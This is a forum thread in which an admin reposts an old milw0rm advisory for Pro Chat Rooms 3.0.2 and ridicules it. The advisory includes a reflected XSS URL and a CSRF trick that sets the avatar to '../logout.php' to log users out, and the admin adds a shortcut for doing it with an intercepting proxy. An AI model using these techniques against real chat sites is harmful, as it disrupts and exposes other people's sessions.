who the F wrote this script??

retarded stuff here. how stupid ppl got owned. or how somebody talks about stuff they have no idea about..etc
Post Reply
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

who the F wrote this script??

Post by Sethioz »

ppl who have used exploits and searched for them, sure should know milw0rm.com
there is an exploit (which i found long ago) http://milw0rm.com/exploits/7409

Code: Select all

#########################################################################
Pro Chat Rooms Version 3.0.2  (XSS/CSRF) Vulnerabilties
#########################################################################
 
 
## AUTHOR : ZynbER
## MAiL   : ZynbER[at]Gmail[dot]com
## HOME   : NoWhere
 
 
## Script WebSite : http://www.prochatrooms.com
 
## Version : Pro Chat Rooms Version 3.0.2
 
 
## EXPLOITS :
 
-==XSS==-
 
http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED
 
Vulnerable code in "/profiles/index.php"
 
 
<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>
 
 
-==CSRF==-
 
When a user sends a message in public room or in pm to onther user ; there is a parameter
to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message
 
The JS sending function; here u can see all params needed to POST a message to user/room
 
//Add a message to the chat server.
function sendChatText() {
 
if(!document.getElementById('txt_message').value) {
   alert("You have not entered a message ");
   return;
}
    if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
    alert("You cannot whisper to yourself! ");
    return;
}
if (sendReq.readyState == 4 || sendReq.readyState == 0) {
    sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
    sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    sendReq.onreadystatechange = handleSendChat;  
    var param = 'message=' + document.getElementById('txt_message').value;
    param += '&name=' + chat_user;
    param += '&nid=' + chat_userid;
    param += '&chat=1';
    param += '&room=' + room;
    param += '&whisper=' + document.getElementById('whisper').value;
    param += '&fontface=' + document.getElementById('font_face').value;
    param += '&fontcolor=' + document.getElementById('font_color').value;
    param += '&fontheight=' + document.getElementById('font_height').value;
    param += '&fontstyle=' + document.getElementById('font_style').value;
    param += '&avatar=' + document.getElementById('user_avatar').value;
    sendReq.send(param);
    document.getElementById('txt_message').value = '';
    }                            
}
 
 
Exploit Example:
 
default  ==> http://www.yoursite.com/[path]/Avatars/online.gif
 
 
Your mallecious CSRF param;  avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php
 
 
in this example the user will logout when he recieves ur message; in a public room all users will
be loged out from the room ;)
 
 
 
 
## Note:  
 
This infos are for educational purpose only;  
I'm not responsable for any damage caused...
 
 
 
## GREETZ  :  Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka
 
        -=== Marequin est fière de l'être ===-
 
#########################################################################
Pro Chat Rooms Version 3.0.2   (XSS/CSRF) Vulnerabilties
#########################################################################

# milw0rm.com [2008-12-10]
now what kind of a RETARD wrote this shit ?
why all this CONFUSING crap and shit ?
its easy as 1 2 3. all you do, is get and open webscarab and intercept a send packet, then you replace avatar.gif (or whatever your avatar is) with "../logout.php"
but that retard who put this up, mumbles and bumbles something about some damn parameters needed to send and shit like this.
why make it so confusing ? ..bah so retarded if you ask me.
User avatar
V
Important
Important
Posts: 159
Joined: Sat Jul 28, 2007 7:36 am

Re: who the F wrote this script??

Post by V »

If this is the best way you know how to do it then it's no wonder it looks like that. Not everyone's knowledge is universal as yours, o wise one.
Last edited by V on Sun Jan 24, 2010 12:22 pm, edited 1 time in total.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: who the F wrote this script??

Post by Sethioz »

..but they are community of exploiters / hackers. or well not really exploiters. milw0rm is site where they post all kind of vulnerabilities and exploits. he should not put some retardness, if it can be done 100 times easier than this code ?!
i still do not understand how it should work in the described way.
eGRes5
Newbie..
Newbie..
Posts: 16
Joined: Thu Apr 19, 2012 1:17 pm

Re: who the F wrote this script??

Post by eGRes5 »

lmao

I've never seen something on milw0rm that didn't need to be fixxed in some way before using and I'm not talking about a few varibles or IP's being entered either.

Anyone smart enough to write a decent exploit is usually smart enough to sell it to iDefense or TippingPoint ZDI if its impact is big enough.
Post Reply